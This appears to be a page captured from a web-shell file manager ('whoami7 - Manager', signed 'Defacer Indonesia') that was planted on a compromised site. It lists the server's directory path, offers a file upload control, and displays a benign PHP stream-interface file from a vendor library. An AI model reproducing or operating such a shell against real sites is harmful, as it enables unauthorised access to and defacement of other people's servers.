whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
IO
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/azjezz/psl/src/Psl/IO/HandleInterface.php
<?php declare(strict_types=1); namespace Psl\IO; /** * An interface for an IO stream. * * For example, an IO handle might be attached to a file, a network socket, or * just an in-memory buffer. * * PHP IO handles can be thought of as having a combination of behaviors - some * of which are mutually exclusive - which are reflected in more-specific * interfaces; for example: * - Close * - Seek * - Read * - Write */ interface HandleInterface { }
Copyright ©2021 || Defacer Indonesia